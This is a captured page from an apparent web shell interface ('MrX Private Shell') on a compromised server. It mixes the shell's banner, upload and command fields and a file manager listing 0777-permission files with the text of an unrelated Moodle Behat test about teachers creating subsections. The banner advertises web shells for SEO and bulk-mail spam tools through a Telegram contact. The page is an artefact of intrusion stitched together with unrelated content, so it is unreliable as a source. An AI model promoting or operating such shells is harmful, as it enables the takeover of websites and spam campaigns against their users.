__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
@mod @mod_subsection
Feature: Teachers create and destroy subsections on section page
  In order to use subsections on section page
  As an teacher
  I need to create and destroy subsections

  Background:
    Given I enable "subsection" "mod" plugin
    And the following "users" exist:
      | username | firstname | lastname | email |
      | teacher1 | Teacher | 1 | teacher1@example.com |
    And the following "courses" exist:
      | fullname | shortname | category | numsections |
      | Course 1 | C1 | 0 | 2 |
    And the following "course enrolments" exist:
      | user | course | role |
      | teacher1 | C1 | editingteacher |
    And I log in as "teacher1"

  Scenario: Activities can be created in a subsection
    Given the following "activities" exist:
      | activity   | name        | course | idnumber | section |
      | subsection | Subsection1 | C1     | forum1   | 1       |
    When I add an "assign" activity to course "Course 1" section "3" and I fill the form with:
      | Assignment name | Test assignment name        |
      | ID number       | Test assignment name        |
      | Description     | Test assignment description |
    And I am on "Course 1" course homepage
    And I click on "Subsection1" "link" in the "region-main" "region"
    Then I should see "Test assignment name" in the "region-main" "region"

  @javascript
  Scenario: Teacher can create activities in a subsection page with the activity chooser
    Given the following "activities" exist:
      | activity   | name         | course | idnumber | section |
      | subsection | Subsection1  | C1     | forum1   | 1       |
    When I am on "Course 1" course homepage with editing mode on
    And I click on "Subsection1" "link" in the "region-main" "region"
    And I add a "Assignment" to section "3" using the activity chooser
    And I set the following fields to these values:
      | Assignment name | Test assignment name        |
      | ID number       | Test assignment name        |
      | Description     | Test assignment description |
    And I press "Save and return to course"
    Then I should see "Test assignment name" in the "region-main" "region"

Filemanager

Name Type Size Permission Actions
subsection_access_restrictions.feature File 3.01 KB 0777
subsection_actionmenu.feature File 11 KB 0777
subsection_coursepage.feature File 6.02 KB 0777
subsection_disabled_plugin.feature File 8.23 KB 0777
subsection_limit.feature File 1.37 KB 0777
subsection_navigation.feature File 4.32 KB 0777
subsection_no_completion.feature File 2.71 KB 0777
subsection_rename.feature File 2.7 KB 0777
subsection_sectionpage.feature File 2.13 KB 0777
subsection_visibility.feature File 3.12 KB 0777
subsection_visibility_badge.feature File 3.63 KB 0777
Filemanager